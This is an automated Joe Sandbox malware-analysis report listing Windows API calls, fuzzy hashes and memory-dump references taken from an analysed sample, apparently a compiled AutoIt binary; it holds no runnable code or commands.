                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: c01f8cc3ab211dfc56d5a56bd88ebeace3b6a18832c949e01704f06a7865458b
                                              • Instruction ID: 828f697e4b47a98992679427f80d83d500f0c04675ab6e22e5a51c7d3d6ef609
                                              • Opcode Fuzzy Hash: c01f8cc3ab211dfc56d5a56bd88ebeace3b6a18832c949e01704f06a7865458b
                                              • Instruction Fuzzy Hash: 6F0162F2900248BFFB519BA09D89EFB736CE708301F400595BB49E2141EA789E848B75
                                              APIs
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                                • Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B044E
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3479070676-0
                                              • Opcode ID: 6838c516d7a97dfdf3878bcdf68edf46ac9e494f351f5d69ba9616777f46040d
                                              • Instruction ID: d47a67450df706d989c4889a88a35b9e565ef1564b237f8ab8ff9c668e4926fc
                                              • Opcode Fuzzy Hash: 6838c516d7a97dfdf3878bcdf68edf46ac9e494f351f5d69ba9616777f46040d
                                              • Instruction Fuzzy Hash: F7A176702042019FCB21EF24C885FAEBBE5AF84314F14891DF9969B2A2DB35E955CF46
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 000B6810
                                              • GetDC.USER32(00000000), ref: 000B6818
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000B6823
                                              • ReleaseDC.USER32(00000000,00000000), ref: 000B682F
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000B686B
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000B687C
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000B964F,?,?,000000FF,00000000,?,000000FF,?), ref: 000B68B6
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000B68D6
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: 2925dcf9d67d81bc138334405c4bc0e9108b5f2fb8a59977c20ff51eb7a1b192
                                              • Instruction ID: 210fed802b383485492d2151fa408f073a0f061c5feaaf6afb3441e47987fc9a
                                              • Opcode Fuzzy Hash: 2925dcf9d67d81bc138334405c4bc0e9108b5f2fb8a59977c20ff51eb7a1b192
                                              • Instruction Fuzzy Hash: 4F314B72101214BFEB118F50CC8AFEA3BA9EB49765F044165FE08AA291D67A9851CBB4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 601d15da23ddfdc03c5e3d70f7e78e33e4c69308e26948c46a509b822fc8bd3b
                                              • Instruction ID: 55edcf6007b9d9422c9828d59c50cac90dc8552c7c498b4a330e2066d43ee133
                                              • Opcode Fuzzy Hash: 601d15da23ddfdc03c5e3d70f7e78e33e4c69308e26948c46a509b822fc8bd3b
                                              • Instruction Fuzzy Hash: F121B0726096057AB21476219D82FEF37BCBF25794B048024FE46AA343EB30DE158BB1
                                              APIs
                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 000B6911
                                              • GetWindowLongW.USER32(016B55F0,000000F0), ref: 000B6944
                                              • GetWindowLongW.USER32(016B55F0,000000F0), ref: 000B6979
                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 000B69AB
                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 000B69D5
                                              • GetWindowLongW.USER32(?,000000F0), ref: 000B69E6
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000B6A00
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 3d1bd08a12b5d888d58dd505e20a7eb020c4235367c43e158e399935a9d694d4
                                              • Instruction ID: f0a9a9c3ccc58fcd6f801440a0c0bb3154a8032465293ed6d33ad9892be22b77
                                              • Opcode Fuzzy Hash: 3d1bd08a12b5d888d58dd505e20a7eb020c4235367c43e158e399935a9d694d4
                                              • Instruction Fuzzy Hash: F7311330644250AFEB61CF18DC88FA537E9FB4A754F1801A4F5198B2B2CB7AAC40DB51
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E2CA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E2F0
                                              • SysAllocString.OLEAUT32(00000000), ref: 0008E2F3
                                              • SysAllocString.OLEAUT32(?), ref: 0008E311
                                              • SysFreeString.OLEAUT32(?), ref: 0008E31A
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0008E33F
                                              • SysAllocString.OLEAUT32(?), ref: 0008E34D
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: d945ee623d4714ed74060d9efab54c4026a0065918ef868ce6a715128792f36b
                                              • Instruction ID: ab0aae4452255683eb69fa4c7e22a2e68897ace1d664ac579d89c9e2c3694654
                                              • Opcode Fuzzy Hash: d945ee623d4714ed74060d9efab54c4026a0065918ef868ce6a715128792f36b
                                              • Instruction Fuzzy Hash: 03215176604219AFEB50EFA8DC88CBF77ECFB09360B448125FA54DB290D674AD45C760
                                              APIs
                                                • Part of subcall function 000A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 000A84A0
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000A68B1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 000A68C0
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 000A68F9
                                              • connect.WSOCK32(00000000,?,00000010), ref: 000A6902
                                              • WSAGetLastError.WSOCK32 ref: 000A690C
                                              • closesocket.WSOCK32(00000000), ref: 000A6935
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 000A694E
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: 5dd6a383d200654521b81d2627046ae764a2df3db2847ec1cca77db6d7d0b172
                                              • Instruction ID: 2d0d798a75a9a4a10955a75a5095508fbfaf47561e1f56ffe3e43de8054fa251
                                              • Opcode Fuzzy Hash: 5dd6a383d200654521b81d2627046ae764a2df3db2847ec1cca77db6d7d0b172
                                              • Instruction Fuzzy Hash: 6C31A471600104AFEB109FA4CC85FBE77BDEB45725F048129F945AB291CB79AC04CBA1
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E3A5
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0008E3CB
                                              • SysAllocString.OLEAUT32(00000000), ref: 0008E3CE
                                              • SysAllocString.OLEAUT32 ref: 0008E3EF
                                              • SysFreeString.OLEAUT32 ref: 0008E3F8
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0008E412
                                              • SysAllocString.OLEAUT32(?), ref: 0008E420
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 0dcbb2a06034d59a2a896bb757c5f19b873b8f4992906bcfe7a9073dc4874078
                                              • Instruction ID: 5db837094b96fd846f4f5a369ded610bb0847cdd62fc72921447b10be8a1e97d
                                              • Opcode Fuzzy Hash: 0dcbb2a06034d59a2a896bb757c5f19b873b8f4992906bcfe7a9073dc4874078
                                              • Instruction Fuzzy Hash: 80218675604205AFEB50AFA8DC88DAF77ECFB09360B008525FA59CB2A1D774ED41CB64
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00054282,?), ref: 000541D3
                                              • GetProcAddress.KERNEL32(00000000), ref: 000541DA
                                              • EncodePointer.KERNEL32(00000000), ref: 000541E6
                                              • DecodePointer.KERNEL32(00000001,00054282,?), ref: 00054203
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: 3cebf60be437cb4c78d0ebeb0d4ca454340344347e26b081d51c5deae9fc894f
                                              • Instruction ID: f1bd46510b04302eabcc36bc8ddb09e4319c480379fa8d33709e2c74e481ce60
                                              • Opcode Fuzzy Hash: 3cebf60be437cb4c78d0ebeb0d4ca454340344347e26b081d51c5deae9fc894f
                                              • Instruction Fuzzy Hash: AAE01270650741EFFB501B70ED4DF5935A8B71070BF504414BA01D51A0CBBD5185EF04
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000541A8), ref: 000542A8
                                              • GetProcAddress.KERNEL32(00000000), ref: 000542AF
                                              • EncodePointer.KERNEL32(00000000), ref: 000542BA
                                              • DecodePointer.KERNEL32(000541A8), ref: 000542D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: e2d2b1654fea3496cd337efd803b83fdb2094246b518cd4bf91bdb476c471f53
                                              • Instruction ID: 9f2f67019f79cad9681a81f3420eba75bd7a09b0e959843ef2a39f9c3d25907d
                                              • Opcode Fuzzy Hash: e2d2b1654fea3496cd337efd803b83fdb2094246b518cd4bf91bdb476c471f53
                                              • Instruction Fuzzy Hash: 6CE0B670651B01EFFB509B60ED0EF993AA8B700B07F504118FA01D94A0CBBD6654EA10
                                              APIs
                                              • GetClientRect.USER32(?,?), ref: 000321B8
                                              • GetWindowRect.USER32(?,?), ref: 000321F9
                                              • ScreenToClient.USER32(?,?), ref: 00032221
                                              • GetClientRect.USER32(?,?), ref: 00032350
                                              • GetWindowRect.USER32(?,?), ref: 00032369
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Rect$Client$Window$Screen
                                              • String ID:
                                              • API String ID: 1296646539-0
                                              • Opcode ID: 552a499c256f340bf2d06df24682a400cd5b81af04beef65bc45d3cc6337c802
                                              • Instruction ID: dbddeb0262b6f8a3d960c582a436ae6a635812fdbdd3547fd4be3dacda410207
                                              • Opcode Fuzzy Hash: 552a499c256f340bf2d06df24682a400cd5b81af04beef65bc45d3cc6337c802
                                              • Instruction Fuzzy Hash: 36B14B79900249DBDF60CFA8C9807EEB7B5FF08710F148129ED59EB254DB35AA90CB64
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: 3e565685ac210e845bbe011017c515c4a5cf1181a4cbdb9c033d3fa72d8085da
                                              • Instruction ID: ee1d8571f75f346f1aa80999478196f88ecf416c2b3536d488d0693bd0899224
                                              • Opcode Fuzzy Hash: 3e565685ac210e845bbe011017c515c4a5cf1181a4cbdb9c033d3fa72d8085da
                                              • Instruction Fuzzy Hash: BE619B7150029AABCF12EF60CC82EFF37A8AF05308F044569F8596B293DB36AD45DB51
                                              APIs
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                                • Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B091D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000B095D
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000B0980
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000B09A9
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000B09EC
                                              • RegCloseKey.ADVAPI32(00000000), ref: 000B09F9
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: aa19cd2b58d2dd751eaedd53c47378916cad3faec0246f926e2b4646a8e8b4ae
                                              • Instruction ID: 550c6abd3dd5ff7a465a108a6fef1d0e7fcd7757546cb4eb31ad8f3584f7b7be
                                              • Opcode Fuzzy Hash: aa19cd2b58d2dd751eaedd53c47378916cad3faec0246f926e2b4646a8e8b4ae
                                              • Instruction Fuzzy Hash: A5516971208201AFD714EF64C885EAFBBE9FF89314F04492DF599872A2DB31E905CB52
                                              APIs
                                              • _memset.LIBCMT ref: 000929FF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00092A4A
                                              • IsMenu.USER32(00000000), ref: 00092A6A
                                              • CreatePopupMenu.USER32 ref: 00092A9E
                                              • GetMenuItemCount.USER32(000000FF), ref: 00092AFC
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00092B2D
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: 4d6499066daee77894310557955b8308a0312201e982a0b64fb5472f8c91792a
                                              • Instruction ID: 6960be883a10141d96191227886965920aaa96e1108f6d630f47ead01fd55485
                                              • Opcode Fuzzy Hash: 4d6499066daee77894310557955b8308a0312201e982a0b64fb5472f8c91792a
                                              • Instruction Fuzzy Hash: D251DD70A0030AFFDF25DF68D888BAEBBF4EF54314F104159E8159B2A2E7709944EB52
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0008C34E
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0008C35F
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0008C366
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0008C36E
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0008C385
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0008C397
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 8fe22b77f42c7c97074d03290da3aef9b5618e916724a102a9b9e3c103d98ce9
                                              • Instruction ID: 72ce14087913c4554ba9c6e8493056fd64441e2bdd982105d0da61970be49c5c
                                              • Opcode Fuzzy Hash: 8fe22b77f42c7c97074d03290da3aef9b5618e916724a102a9b9e3c103d98ce9
                                              • Instruction Fuzzy Hash: CC014475E00318BBEF109FA59C49E5EBFB8EB58751F144065FA08AB281D6749D11CFA0
                                              APIs
                                                • Part of subcall function 000316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00031729
                                                • Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031738
                                                • Part of subcall function 000316CF: BeginPath.GDI32(?), ref: 0003174F
                                                • Part of subcall function 000316CF: SelectObject.GDI32(?,00000000), ref: 00031778
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000BC57C
                                              • LineTo.GDI32(00000000,00000003,?), ref: 000BC590
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000BC59E
                                              • LineTo.GDI32(00000000,00000000,?), ref: 000BC5AE
                                              • EndPath.GDI32(00000000), ref: 000BC5BE
                                              • StrokePath.GDI32(00000000), ref: 000BC5CE
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: b167fcbbde2f96892e4afe797f300c99536916ba83787326bf1d431e12568412
                                              • Instruction ID: 4b12b087d6847baa31f7b6887dafbf02d39bc3933bbd1577325c6755f69213a7
                                              • Opcode Fuzzy Hash: b167fcbbde2f96892e4afe797f300c99536916ba83787326bf1d431e12568412
                                              • Instruction Fuzzy Hash: D8111B7200010DFFEF129F90DC88FEA7FADEB08354F048021BA585A160C775AE95DBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000507EC
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 000507F4
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000507FF
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0005080A
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00050812
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0005081A
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
